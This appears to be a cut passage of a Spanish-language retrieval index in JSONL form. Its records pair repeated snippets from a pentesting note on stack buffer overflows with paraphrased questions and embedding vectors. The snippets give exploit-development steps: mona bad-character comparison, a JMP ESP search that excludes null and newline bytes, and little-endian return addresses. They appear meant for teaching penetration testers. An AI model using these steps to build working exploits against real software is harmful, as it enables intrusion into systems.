\"unmodified\".", "indexar": "cual es una herramienta para comparar dos bloques de memoria", "v": [0.13894, 0.08283, -0.06897, -0.13794, -0.03857, -0.0905, -0.03478, 0.05257, -0.14603, -0.12752, -0.04112, 0.00413, 0.00364, -0.00743, 0.08598, 0.03529, 0.09112, -0.0852, -0.08078, -0.03379, 0.01287, -0.07055, -0.06078, 0.06013, -0.13631, -0.02367, -0.01044, 0.04787, -0.16474, 0.04681, 0.01418, -0.02709, 0.09059, -0.1292, -0.06652, -0.00898, 0.10195, 0.03495, 0.01918, 0.00174, -0.02745, 0.05098, -0.06163, 0.03343, -0.01192, -0.03784, -0.01261, 0.10218, 0.07393, -0.00038, -0.04098, -0.03461, -0.04497, 0.06467, 0.07572, -0.12847, 0.20929, 0.00509, 0.03275, -0.07758, -0.13215, 0.0287, -0.01143, -0.04735, 0.05532, -0.04522, -0.03026, 0.00076, -0.09446, 0.11736, -0.08392, 0.01648, -0.0048, -0.04388, -0.00706, 0.0627, 0.08508, 0.01253, 0.02796, 0.08613, -0.01076, -0.1112, -0.0487, 0.04488, -0.01272, 0.08031, 0.0454, -0.00443, -0.00087, -0.0527, -0.04518, 0.11937, -0.0371, 0.14249, 0.10146, -0.03107, 0.08997, 0.13, 0.07397, 0.00858, 0.10888, -0.08067, -0.09661, 0.12181, 0.01736, 0.02792, -0.07326, 0.02878, -0.10084, -0.11837, 0.10531, -0.04685, -0.03678, 0.08166, -0.09196, 0.03877, 0.02044, -0.02662, 0.01965, -0.10404, 0.05722, 0.01037, -0.11723, -0.1054, 0.01802, 0.02492, -0.06787, 0.05046, -0.07605, -0.00652, -0.02805, 0.1419, -0.0638, -0.09037, -0.01086, 0.02531, 0.04388, -0.05506, 0.07562, -0.0538, 0.06335, 0.05439, -0.01381, -0.07429, -0.05621, 0.02864, 0.05198, 0.06264, -0.06338, 0.02981, 0.00674, -0.04168, 0.03992, 0.0227, -0.04622, -0.01506, -0.05851, -0.01549, -0.12822, 0.01232, -0.09789, -0.0287, 0.08302, 0.00488, -0.0186, -0.07687, -0.01915, 0.08744, 0.07528, -0.01232, 0.04263, -0.08938, 0.00859, -0.01545, -0.05194, -0.11916, -0.08678, -0.02207, 0.00431, -0.05694, -0.02511, 0.00587, -0.07972, -0.00682, -0.02772, -0.07991, 0.02943, 0.00302, 0.05036, 0.00356, -0.01625, -0.02334, 0.07613, -0.05093, 0.05276, -0.045, -0.03049, -0.0377, 0.05876, 0.03986, -0.06691, 0.03419, -0.05921, -0.0221, 0.02009, 0.10953, -0.04437, -0.0044, 0.02086, -0.01599, 0.03179, -0.02166, 0.00775, -0.01121, -0.0373, -0.03008, -0.03461, -0.00763, -0.03415, -0.03964, 0.03391, 0.03158, 0.03073, 0.01145, -0.11392, 0.01796, 0.02444, 0.04925, -0.01677, -0.03433, -0.02824, -0.01721, -0.02088, 0.00208, 0.06234, -0.00083, -0.01619, -0.04676, -0.03725, 0.00653, 0.02011, 0.02864, -0.03139, -0.00404, -0.05977, -0.04608, 0.00052, -0.01157, 0.03131, -0.10522, -0.01457, 0.04044, 0.04562, -0.00564, 0.01061, -0.03459]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# envΓ­as offset + \"BBBB\" + bytearray, y comparas en memoria (ESP):\n!mona compare -f C:\\mona\\app\\bytearray.bin -a \n```\nQuita los corruptos (tΓ­pico: `\\x00`, a veces `\\x0a \\x0d`) y repite hasta \"unmodified\".", "indexar": "que programa sirve para detectar y eliminar bytes nulos en un archivo", "v": [0.0701, -0.0378, -0.1124, -0.1439, 0.00785, -0.09878, -0.12187, -0.00222, -0.10015, -0.05596, -0.08934, -0.09558, -0.0634, -0.05347, 0.06355, -0.07979, 0.0234, -0.15524, 0.13516, -0.02985, 0.05135, -0.02326, 0.04753, -0.00859, -0.05916, 0.08729, -0.04947, -0.00345, -0.05924, 0.00647, -0.06909, -0.07254, 0.10507, -0.05998, -0.03682, 0.0728, 0.05577, -0.06955, -0.12095, 0.1042, 0.12027, 0.14619, -0.03359, 0.12395, 0.0129, -0.10597, 0.05964, 0.0539, 0.10918, -0.02835, 0.08216, -0.03318, -0.05488, -0.01278, -0.05891, -0.1149, -0.04643, -0.10724, 0.02203, -0.08061, -0.08521, 0.10765, 0.02464, -0.06505, 0.0187, -0.05653, 0.06815, 0.01602, -0.13164, 0.06891, -0.07164, 0.13354, 0.16256, 0.01444, -0.05823, 0.03814, -0.08534, -0.1014, 0.01866, -0.03218, 9e-05, -0.00845, 0.0571, 0.01198, -0.15105, -0.0551, -0.00749, 0.00203, -0.01841, -0.07752, 0.02348, 0.11548, 0.04619, 0.04659, 0.11121, -0.05506, 0.16982, 0.06483, 0.03588, 0.06185, 0.06192, -0.1114, -0.07426, 0.13547, 0.05367, 0.07849, -0.00774, 0.05085, -0.0885, 0.04838, 0.02559, -0.02877, 0.06099, -0.029, -0.12007, 0.00935, 0.01911, 0.02507, -0.02636, 0.00627, -0.11706, 0.02163, -0.08003, 0.06996, 0.00253, -0.08729, -0.03509, 0.06584, -0.03653, 0.02658, 0.0158, 0.03067, -0.08636, -0.07239, -0.09669, -0.04935, -0.00352, -0.02538, 0.00412, -0.01527, 0.07092, 0.09523, -0.01227, 0.05369, 0.11946, -0.02171, -0.02318, -0.01712, -0.03645, -0.01584, 0.06078, -0.04923, -0.05176, 0.00254, -0.11558, 0.02384, 0.04648, -0.08919, -0.05632, -0.00968, -0.04341, 0.0631, 0.00622, -0.00939, 0.08959, -0.05682, -0.00094, 0.06437, 0.09476, 0.0196, 0.00087, -0.04218, 0.00621, -0.12395, -0.06972, 0.0907, 0.02362, -0.07158, 0.0591, -0.00311, -0.03338, 0.00192, 0.0735, 0.03983, -0.05075, -0.04049, 0.0395, -0.02647, 0.01093, -0.00924, 0.02505, 0.01747, 0.00205, 0.04371, 0.04156, -0.02222, -0.00634, 0.03734, 0.04326, 0.02591, -0.03717, -0.02415, 0.00535, 0.08618, 0.02742, 0.04227, 0.00396, -0.03073, 0.01893, 0.01123, -0.00382, 0.02108, -0.01363, 0.00549, -0.05099, -0.01834, 0.01856, 0.07248, 0.03543, 0.04192, -0.01652, -0.00038, 0.08338, 0.01126, -0.0041, -0.06828, 0.03514, 0.02941, 0.01232, -0.03905, 0.03906, 0.03819, -0.00052, 0.04578, 0.02165, -0.03552, 0.00836, -0.03308, -0.0018, -0.07754, 0.00544, 0.00845, -0.02213, -0.03018, -0.01637, 0.00622, -0.00377, 0.01536, 0.02682, -0.0256, -0.07486, 0.0158, 0.07026, 0.00101, 0.03215, 0.06226]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# envΓ­as offset + \"BBBB\" + bytearray, y comparas en memoria (ESP):\n!mona compare -f C:\\mona\\app\\bytearray.bin -a \n```\nQuita los corruptos (tΓ­pico: `\\x00`, a veces `\\x0a \\x0d`) y repite hasta \"unmodified\".", "indexar": "como puedo verificar si dos datos binarios coinciden exactamente", "v": [0.01877, 0.24089, -0.18794, 0.01742, 0.01541, -0.11651, -0.00405, -0.0887, -0.14003, -0.11477, 0.11004, -0.09832, -0.03632, -0.04201, 0.10292, -0.04901, -0.01943, -0.07485, 0.05325, -0.12243, 0.09381, -0.15506, 0.07241, -0.01753, 0.028, -0.00749, -0.09306, 0.03066, -0.13429, 0.09087, 0.11078, 0.00512, 0.06506, -0.01632, -0.11195, 0.0983, -0.02935, 0.10238, 0.0095, -0.00798, 0.0006, 0.03566, -0.04393, 0.08586, -0.05739, -0.0113, -0.14216, 0.06498, -0.06383, -0.13029, 0.02466, 0.11076, -0.08062, 0.00312, -0.08678, -0.11093, 0.10124, -0.00858, 0.06792, -0.03035, -0.00158, 0.01158, 0.0813, 0.05012, -0.07007, 0.01772, 0.05783, 0.10323, -0.02349, 0.01509, -0.09187, 0.14621, -0.00956, 0.0526, -0.0057, -0.06639, 0.09254, 0.01774, 0.10757, 0.07095, 0.0188, 0.02793, 0.06053, 0.05329, -0.02477, 0.03923, 0.00954, -0.06558, -0.06616, -0.03807, 0.03462, 0.11611, -0.06661, 0.07439, 0.09185, 0.05858, -0.02657, -0.04692, -0.00257, 0.09661, 0.02655, 0.03458, -0.04764, 0.08831, -0.0378, 0.1257, 0.01871, 0.05936, -0.03334, -0.08566, -0.01033, -0.0424, -0.06834, -0.11744, 0.09179, -0.04144, -0.03761, -0.0674, 0.02716, 0.03443, -0.07017, -0.03564, 0.02238, -0.00321, -0.00767, -0.08534, -0.00078, 0.08524, 0.05521, 0.11599, -0.01587, 0.02349, -0.0844, -0.02336, 0.03509, 0.07527, -0.0191, -0.13649, 0.01027, -0.01354, 0.0382, 0.04995, -0.03611, -0.00806, 0.0806, 0.04372, -0.03771, -0.00706, -0.0513, -0.00586, -0.01902, 0.02559, 0.04629, 0.06804, -0.03117, 0.03792, 0.06368, -0.05426, 0.01773, 0.0028, 0.00213, 0.0104, -0.05096, 0.00056, 0.01419, -0.007, 0.04041, -0.04709, 0.05388, -0.02476, -0.05972, 0.06059, -0.01346, -0.09512, 0.04303, -0.0806, -0.03794, 0.01464, -0.02994, -0.02628, -0.03794, -0.04963, 0.06154, -0.05948, -0.01101, -0.02173, 0.03192, -0.0281, 0.02483, -0.01044, 0.07785, 0.03119, 0.04781, -0.02954, 0.01197, -0.03237, 0.02617, 0.04149, 0.03028, -0.02424, 0.00632, 0.0355, -0.01524, -0.01135, 0.05457, 0.04259, -0.07997, -0.03828, 0.03037, -0.0265, -0.0179, -0.09368, 0.04954, -0.07651, -0.09546, -0.0319, 0.08048, -0.00152, 0.03904, -0.04973, -0.03507, 0.02212, 0.04686, 0.01665, -0.02997, 0.01345, 0.0462, 0.07583, 0.00586, 0.06002, -0.05486, 0.04946, -7e-05, 0.03826, 0.07919, 0.00408, 0.01727, -0.01407, -0.02624, -0.05518, 0.06708, 0.06826, -0.01504, -0.09419, 0.01206, 0.01383, -0.11156, -0.02124, 0.01696, -0.07889, -0.01142, 0.00157, 0.02128, -0.06083, -0.00766, -0.05224]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 5. JMP ESP β€” la direcciΓ³n de retorno\n```\n!mona jmp -r esp -cpb \"\\x00\\x0a\\x0d\" # busca un JMP ESP sin badchars", "indexar": "que programa sirve para montar un salto a ESP en exploits?", "v": [0.00513, -0.05971, -0.29953, -0.2137, -0.17865, -0.1237, -0.04697, -0.12907, -0.05205, -0.05859, -0.05562, -0.01007, 0.0012, 0.04506, -0.02376, -0.02897, 0.05585, -0.0055, 0.02404, 0.02515, -0.02088, 0.03758, 0.06904, -0.15071, 0.04962, 0.11405, -0.09267, 0.08137, -0.05734, 0.05943, 0.024, 0.21801, -0.05006, -0.09476, 0.15389, -0.10344, 0.11929, -0.11068, 0.08214, 0.01051, 0.0282, -0.09925, -0.01958, -0.05452, 0.0331, -0.02754, 0.04037, 0.0213, 0.07351, 0.05883, 0.12517, 0.04644, 0.01659, -0.10598, -0.03483, -0.03792, -0.01406, -0.01581, -0.0699, 0.03935, 0.02977, -0.06841, 0.02228, 0.03244, 0.00557, -0.07661, 0.00362, -0.00196, -0.18284, 0.05586, -0.0006, -0.029, 0.01407, 0.04639, -0.03451, -0.06497, 0.02928, -0.04991, 0.01125, 0.02497, -0.06558, -0.02032, -0.00087, 0.06477, -0.08726, -0.04998, -0.02717, 0.00269, 0.07399, 0.00059, 0.03215, 0.0788, 0.0307, -0.03073, 0.03027, -0.10761, 0.15964, 0.06088, 0.0532, 0.08699, -0.05759, -0.0343, -0.07615, 0.11052, -0.06408, 0.05163, 0.03882, -0.04199, -0.04401, 0.00481, -0.00923, 0.04925, -0.10862, -0.02055, -0.042, -0.05949, -0.06721, -0.00231, -0.0218, -0.01754, -0.11777, 0.04904, 0.00048, -0.01711, 0.07225, -0.05712, 0.03566, 0.07264, -0.01456, 0.0912, -0.00461, 0.06472, 0.04966, 0.00318, -0.01509, -0.16224, 0.07639, 0.0177, 0.02995, 0.02848, 0.03374, 0.02493, -0.00363, -0.04922, -0.0415, 0.05008, 0.07506, -0.06059, 0.04739, -0.00525, 0.03819, 0.01334, -0.08279, 0.03664, -0.01823, -0.10388, 0.05209, 0.00123, -0.05801, 0.15251, -0.02934, 0.02911, 0.01467, -0.0298, 0.02508, -0.01748, 0.02794, -0.01621, 0.05663, 0.08104, -0.06367, 0.10514, 0.06935, -0.02072, 0.10264, 0.01788, -0.02743, 0.00103, -0.00267, 0.04067, -0.06594, -0.02306, 0.0933, 0.04178, -0.00154, -0.04861, 0.0175, 0.00969, -0.00536, -0.02824, 0.01895, -0.05981, -0.01616, 0.01668, -0.03579, -0.02645, -0.04044, 0.03699, 0.03535, -0.0419, -0.04564, -0.00601, -0.00907, 0.01378, 0.07317, 0.01032, 0.04459, 0.00612, 0.03226, 0.10775, -0.01457, 0.01022, 0.0226, -0.03595, -0.01003, -0.00138, 0.02126, 0.06564, -0.01157, -0.03186, 0.00154, -0.0105, 0.02404, 0.0375, -0.01077, -0.01723, -0.02185, -0.00109, -0.0311, 0.03441, -0.0269, -0.07509, 0.0414, 0.04562, -0.02851, -0.06226, 0.00023, 0.02627, 0.00971, -0.08333, -0.07318, 0.01891, 0.01564, -0.02495, -0.01188, 0.03989, -0.01651, 0.03785, 0.03698, -0.00695, 0.00606, -0.01166, -0.06411, -0.0405, 0.01764, 0.04777]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 5. JMP ESP β€” la direcciΓ³n de retorno\n```\n!mona jmp -r esp -cpb \"\\x00\\x0a\\x0d\" # busca un JMP ESP sin badchars", "indexar": "con que puedo hacer un JMP ESP evitando los badchars?", "v": [-0.1413, 0.06053, -0.09904, -0.00633, -0.18292, 0.0144, -0.01298, 0.00572, -0.11347, -0.0807, -0.03326, 0.2138, 0.10128, -0.02686, -0.01693, 0.02345, 0.06347, 0.12255, 0.02285, 0.07087, -0.04865, 0.01215, -0.03618, -0.09618, 0.11706, 0.21014, -0.20264, 0.17142, -0.14388, 0.07068, -0.04088, 0.14421, -0.02308, 0.03583, 0.07073, 0.15078, 0.13307, 0.09288, -0.07177, 0.11176, 0.12799, 0.01983, 0.02647, -0.0581, -0.0259, 0.06839, 0.0213, 0.08649, 0.05292, 0.05544, -0.10514, 0.07957, -0.16683, -0.09129, -0.00776, 0.05123, 0.02079, -0.09635, -0.04551, -0.05132, 0.05488, 0.0222, -0.01643, 0.05831, 0.10069, -0.11863, 0.05972, -0.08026, -0.00846, -0.01944, -0.05897, -0.06141, 0.0065, -0.10569, -0.02411, -0.01025, -0.01227, 0.01361, 0.14412, 0.00104, 0.02952, -0.10417, -0.01958, 0.054, 0.00113, -0.11577, -0.1408, 0.02755, -0.01387, -0.0894, 0.06253, 0.0325, 0.11779, 0.06403, -0.03053, -0.13041, 0.06233, 0.0722, 0.04088, 0.01037, 0.06793, 0.05805, -0.08728, -0.01642, -0.05723, -0.08458, 0.03839, -0.04741, 0.0104, -0.03047, -0.01382, 0.05961, -0.10163, -0.03978, 0.00351, -0.08438, -0.12106, -0.02773, -0.02257, -0.0061, 0.01537, -0.04702, -0.05826, -0.04259, 0.01445, -6e-05, 0.00494, 0.01819, 0.06808, 0.0791, -0.03606, 0.0453, -0.02474, 0.00011, -0.04218, 0.03709, 0.02145, 0.08317, -0.00129, -0.0016, -0.06366, 0.074, 4e-05, -0.02895, 0.00012, -0.01943, 0.04835, -0.06319, 0.0382, 0.0323, 0.07447, 0.0131, -0.00135, 0.04281, 0.1077, 0.0667, 0.06759, -0.05179, 0.00789, 0.02076, -0.01626, 0.08094, -0.01286, 0.04216, 0.03626, 0.0085, 0.03406, -0.01689, 0.05785, -0.00855, 0.00298, 0.04195, -0.01154, -0.03761, -0.00461, 0.05107, -0.00168, 0.03317, -0.00411, -0.00146, 0.0008, -0.04221, -0.07118, -0.01176, -0.00292, -0.01853, -0.00851, -0.00978, 0.03401, -0.03839, 0.0011, 0.06822, 0.04254, 0.03049, 0.008, -0.01603, -0.00493, -0.01817, -0.0632, 0.03116, -0.04474, -0.00403, 0.03708, -0.00723, 0.04147, -0.03834, 0.00704, 0.01394, 0.00195, 0.01899, 0.03325, -0.02116, 0.04402, -0.09611, -0.01176, 0.05265, -0.02009, 0.03101, 0.00836, -0.04198, 0.03457, 0.04021, -0.00378, -0.02645, 0.02402, 0.00036, -0.01958, -0.02161, -0.01603, 0.04736, -0.06337, 0.00945, 0.03441, -0.02595, -0.01158, 0.01788, -0.03351, -0.02971, 0.0024, 0.02281, 0.00136, -0.02599, 0.04772, -0.02168, 0.02784, 0.01951, -0.07489, 0.03776, 0.01224, -0.03906, 0.02052, 0.00896, 0.05804, 0.06501, 0.03552, 0.02272]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 5. JMP ESP β€” la direcciΓ³n de retorno\n```\n!mona jmp -r esp -cpb \"\\x00\\x0a\\x0d\" # busca un JMP ESP sin badchars", "indexar": "hay alguna herramienta para escribir saltos de retorno con caracteres controlados?", "v": [0.21208, 0.13185, -0.1082, -0.13305, -0.12928, -0.21797, -0.06871, -0.05059, 0.13803, -0.02754, 0.01323, -0.06644, 0.00461, -0.01284, 0.15285, 0.06587, 0.08216, 0.00117, -0.05402, -0.0369, -0.01284, -0.07773, -0.04444, -0.06003, -0.0978, -0.10907, -0.04913, 0.1081, -0.14225, 0.05681, -0.03365, 0.14598, 0.06043, -0.05013, 0.01414, -0.05035, 0.0094, 0.0464, 0.00667, 0.14912, -0.04517, 0.04675, -0.00343, -0.01931, 0.03293, -0.00836, -0.02996, 0.05886, 0.00231, -0.04765, 0.05072, -0.11751, 0.01727, -0.0204, -0.11276, -0.08979, 0.1878, 0.01427, -0.06132, -0.09272, -0.02222, 0.05738, 0.01064, 0.03179, -0.0902, -0.02928, 0.0047, -0.14178, -0.19719, 0.15781, 0.09081, 0.02556, -0.07137, 0.06312, 0.03323, -0.04427, -0.02835, -0.0315, 0.10519, 0.02701, -0.11149, -0.06266, -0.02399, -0.00826, 0.04597, -0.08583, -0.14573, -0.14974, 0.01342, 0.07931, 0.02742, -0.05493, 0.02422, -0.10803, -0.07953, 0.01656, 0.05033, 0.00396, -0.06539, 0.04479, 0.05081, 0.05503, 0.00493, 0.10729, -0.00772, 0.06241, 0.00296, -0.01712, -0.03644, -0.01719, 0.0278, -0.00608, 0.06048, -0.04067, -0.02233, 0.03895, -0.0054, -0.03524, -0.02045, -0.05531, 0.00592, -0.00709, -0.0598, -0.05926, 0.01698, 0.02045, -0.00463, 0.02284, 0.00355, -0.00901, -0.04271, 0.00692, -0.0148, -0.02748, -0.0013, 0.04284, 0.10768, 0.0277, 0.06958, -0.02693, 0.02276, 0.01278, -0.02699, -0.10705, -0.00826, 0.0636, 0.00398, -0.03821, -0.08279, -0.01105, 0.05049, 0.02095, -0.05819, 0.07944, -0.03497, -0.05018, 0.01106, -0.0223, -0.13928, 0.1175, -0.09941, 0.01474, 0.01958, 0.05813, -0.00382, 0.02694, 0.01377, -0.06102, -0.01383, 0.04332, -0.07651, -0.0161, 0.08561, -0.01888, 0.08518, -0.02326, -0.07601, 0.02329, -0.01294, -0.06645, 0.00975, 0.0185, -0.04588, -0.04117, 0.04762, -0.06014, 0.0215, 0.03851, 0.01572, -0.03156, -0.03469, -0.0068, 0.0066, -0.07678, -0.03873, 0.01268, -0.07073, 0.006, 0.04029, -0.05122, 0.01197, 0.01092, -0.03666, -0.00936, 0.1196, 0.03539, -0.04628, -0.02989, -0.02624, 0.02067, 0.03876, -0.02942, 0.05401, 0.04577, -0.01677, -0.00637, 0.00015, 0.00704, -0.02009, -0.00422, 0.07176, -0.01345, 0.0668, 0.05052, 0.025, -0.04057, 0.03794, -0.03547, -0.02959, 0.04878, -0.03173, -0.01513, -0.01706, 0.03937, -0.01314, -0.0627, 0.0049, -0.03446, -0.05535, -0.00418, -0.03387, 0.0119, 0.00197, -0.04107, -0.02966, -0.01266, -0.00111, 0.02846, -0.04885, -0.04437, 0.03814, -0.00274, 0.03755, -0.0843, -0.0076, 0.00478]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# alternativa: objdump -d vuln.exe | grep -i 'jmp.*esp'\n```\nApunta la direcciΓ³n **en little-endian** (ej. `0x625011AF` β†’ `\\xAF\\x11\\x50\\x62`).", "indexar": "con que puedo analizar el cΓ³digo de un ejecutable en Little Endian?", "v": [-0.05075, 0.14663, -0.08169, 0.08785, -0.04727, -0.10559, 0.00983, 0.13324, -0.16249, -0.07959, -0.10648, -0.09525, 0.02345, -0.07315, 0.04647, -0.0685, 0.05849, -0.10408, 0.02728, -0.06074, 0.01311, -0.01331, -0.06084, -0.01728, 0.0582, 0.06982, -0.01388, 0.16324, -0.04806, 0.01019, -0.08921, 0.10933, 0.05912, -0.06811, 0.05721, 0.12318, 0.0503, 0.12712, -0.04143, 0.12315, -0.00607, 0.062, -0.15114, -0.02575, -0.03886, 0.03501, 0.01289, 0.09848, -0.02023, -0.0438, -0.06345, -0.01043, -0.09498, -0.06966, 0.11169, -0.05334, 0.04017, -0.11517, 0.09989, 0.03046, 0.05057, -0.08426, 0.05203, -0.11836, 0.03815, 0.04609, 0.06725, 0.06522, 0.00946, 0.05744, -0.02041, 0.1298, -0.12273, -0.04508, 0.06043, 0.03982, -0.07687, 0.0001, 0.07358, 0.12215, 0.00925, -0.07097, -0.10285, 0.00582, -0.05263, 0.01621, -0.10642, -0.11248, 0.02383, -0.03321, 0.09153, 0.0008, 0.01685, 0.04989, 0.0561, 0.02839, 0.06782, -0.00152, 0.02547, 0.03288, 0.0973, -0.05843, -0.08068, 0.05843, 0.12238, 0.09696, 0.07975, -0.02839, 0.05435, -0.07263, -0.04716, -0.04077, -0.15191, -0.0831, -0.15223, -0.07747, -0.06701, -0.02992, 0.01482, -0.05223, -0.11271, 0.00191, -0.1095, 0.03792, -0.03474, 0.01431, 0.0042, 0.02319, 0.05067, -0.04419, -0.03686, 0.00908, -0.09926, -0.01834, -0.01822, 0.05258, 0.03581, -0.01524, 0.01096, 0.01703, 0.06411, 0.03964, 0.06261, 0.07877, 0.04472, 0.07124, -0.05751, -0.10278, -0.05353, 0.06771, 0.10172, 0.03291, -0.07947, 0.05226, -0.02911, -0.04521, 0.00494, -0.00511, -0.03302, 0.02168, -0.01477, 0.00518, -0.03329, -0.02958, 0.01405, -0.05473, -0.02366, -0.04233, 0.02788, 0.01902, -0.02082, 0.00537, 0.01717, -0.06726, 0.13238, -0.06239, -0.06657, -0.04012, 0.01142, -0.04256, 0.01785, 0.0321, 0.01683, -0.03243, -0.01, 0.03096, 0.00925, 0.04129, -0.00449, 0.01069, 0.02592, 0.00187, 0.02017, 0.03379, -0.06457, -0.01402, 0.04101, 0.02409, -0.01261, -0.07868, -0.05553, 0.04387, -0.02301, -0.06316, 0.06282, 0.08185, -0.02704, 0.07126, -0.05471, 0.06274, 0.03341, -0.00272, 0.07199, -0.04318, -0.07174, -0.02182, 0.02125, 0.04977, 0.06035, 0.05373, -0.02599, -0.00417, 0.12225, -0.05497, -0.01273, -0.00492, -0.00854, 0.00612, 0.04044, 0.00186, -0.0369, 0.00423, 0.00898, -0.00896, 0.04633, 0.02681, -0.01689, 0.0102, -0.05754, -0.07652, 0.02384, 0.05625, -0.06202, -0.0467, 0.03699, -0.07913, -0.10161, -0.02417, -0.00564, -0.04075, -0.02505, 0.02425, 0.01672, -0.06119, 0.00825, -0.06048]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# alternativa: objdump -d vuln.exe | grep -i 'jmp.*esp'\n```\nApunta la direcciΓ³n **en little-endian** (ej. `0x625011AF` β†’ `\\xAF\\x11\\x50\\x62`).", "indexar": "cual programa me sirve para ver la direccion en little-endian dentro de otro archivo?", "v": [-0.07406, 0.03455, -0.06759, -0.09798, -0.03693, -0.11689, 0.03604, -0.07632, -0.04086, -0.09329, -0.01957, -0.18621, -0.05032, -0.15411, 0.06723, -0.05544, 0.25203, -0.02596, 0.19894, 0.00145, 0.00512, 0.09048, 0.0113, -0.02356, -0.0922, -0.00854, 0.10891, 0.04042, -0.13228, 0.00855, 0.03731, 0.01923, 0.09761, -0.05556, -0.01364, 0.00826, 0.1013, 0.02916, -0.08294, 0.14372, 0.02513, 0.01761, -0.09781, 0.1078, -0.01387, -0.08841, 0.12679, 0.059, -0.03188, -0.04186, -0.02045, -0.00638, 0.02735, 0.06304, 0.01395, -0.08022, -0.06291, -0.17594, 0.09028, 0.0217, -0.06926, 0.00185, 0.00861, -0.03107, -0.01153, -0.07345, 0.03088, 0.0172, -0.15995, -0.05787, -0.06524, 0.16046, 0.11738, -0.0495, -0.10837, 0.00866, -0.03956, -0.07657, -0.03464, 0.00877, 0.00983, 0.05632, -0.02315, 0.08037, -0.09582, -0.01426, 0.03034, 0.0183, 0.00146, -0.08023, 0.04526, 0.02273, -0.10872, 0.03176, 0.07221, -0.06926, 0.04116, 0.09589, 0.02223, 0.07853, 0.05716, -0.03837, -0.0577, 0.12162, 0.0627, 0.10754, 0.03949, -0.00107, -0.04557, 0.06152, 0.07878, 0.02562, 0.03934, 0.03035, -0.11184, -0.00681, 0.00898, -0.01321, 0.08706, -0.04732, -0.09671, -0.01, -0.06257, 0.07629, -0.00202, -0.01726, -0.0184, 0.117, -0.03516, 0.05672, -0.02868, 0.01207, -0.06422, -0.05237, -0.00661, -0.09064, 0.09756, 0.01119, 0.00345, -0.00611, 0.12159, -0.02146, 0.03988, 0.02613, 0.02517, -0.00996, 0.05849, -0.11459, -0.02522, -0.04442, 0.0056, -0.05642, 0.04512, 0.02821, 0.00872, -0.0292, 0.05904, -0.0818, -0.08141, -0.02558, 0.01172, 0.04283, -0.04748, -0.05628, 0.00168, -0.12861, -0.05721, 0.02493, 0.03979, 0.00245, -0.00932, -0.02123, -0.0161, -0.06322, -0.02347, -0.04554, -0.05747, -0.08409, 0.10993, -0.00664, 0.00502, 0.03597, 0.06503, 0.08277, -0.01616, -0.05553, -0.02636, 0.01218, -0.00455, -0.00572, -0.03522, -0.02843, -0.04551, -0.00367, -0.0117, 0.00679, -0.02208, -0.00672, 0.01443, -0.03647, 0.00506, -0.01409, -0.02872, 0.00496, 0.03669, 0.06088, -0.00986, 0.01074, 0.00169, 0.09209, 0.03977, 0.01155, 0.08477, 0.02936, -0.08522, 0.00023, 0.02808, 0.01946, 0.01499, 0.01592, -0.06412, -0.00594, 0.09932, -0.00025, -0.00783, -0.03932, 0.03471, -0.01576, -0.00531, 0.00595, -0.04183, -0.00618, 0.01079, -0.03055, 0.03992, -0.05232, -0.03498, 0.00568, -0.00544, -0.1396, -0.02819, 0.06223, 0.00097, -0.03609, -0.00968, 0.05498, -0.03691, 0.04049, -0.0204, -0.01392, -0.06396, -0.00833, 0.0073, -0.04861, 0.04619, 0.00161]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# alternativa: objdump -d vuln.exe | grep -i 'jmp.*esp'\n```\nApunta la direcciΓ³n **en little-endian** (ej. `0x625011AF` β†’ `\\xAF\\x11\\x50\\x62`).", "indexar": "que herramienta permite convertir una direccion hex a bytes en little-endian?", "v": [0.03197, -0.08356, -0.13963, -0.12514, 0.05394, -0.13604, -0.14278, -0.04449, 0.04424, -0.09889, -0.05196, -0.03323, -0.11808, -0.15223, 0.14359, -0.02389, 0.04539, -0.09676, -0.00951, -0.09169, 0.12078, 0.02332, -0.11178, 0.03183, 0.00904, -0.01738, 0.04955, 0.07471, -0.26346, 0.05034, 0.02939, -0.05457, -0.00084, 0.06004, -0.16677, -0.06326, -0.09038, 0.11527, 0.01252, 0.06225, -0.01102, 0.07194, -0.05402, 0.12024, -0.02978, -0.02832, -0.01693, 0.0337, 0.01479, -0.12535, 0.0214, -0.13931, -0.19384, 0.0439, 0.00998, -0.1127, 0.20567, -0.07786, 0.00992, -0.14483, -0.03901, 0.02585, 0.04282, -0.10717, 0.00064, -0.01832, 0.00487, -0.03549, -0.20386, 0.02682, 0.01794, 0.0855, 0.02074, -0.01078, -0.04393, -0.05179, -0.03619, -0.02868, -0.0061, 0.00235, 0.01477, 0.00514, -0.09157, -0.03816, -0.0462, -0.00669, 0.01679, -0.03862, 0.03721, -0.04909, 0.05197, 0.00575, 0.00235, -0.01834, 0.05606, -0.05295, 0.02001, 0.01129, -0.06564, 0.02085, 0.09756, 0.00886, -0.12638, 0.08653, 0.04863, 0.02884, -0.01135, 0.01802, -0.04765, 0.04994, 0.11731, 0.04963, 0.06676, -0.00642, -0.0466, 0.01317, 0.03083, 0.01124, -0.07398, -0.04293, -0.05706, -0.02238, -0.05985, 0.04703, -0.04949, 0.01474, -0.04405, 0.06911, 0.00577, -0.10242, 0.01112, 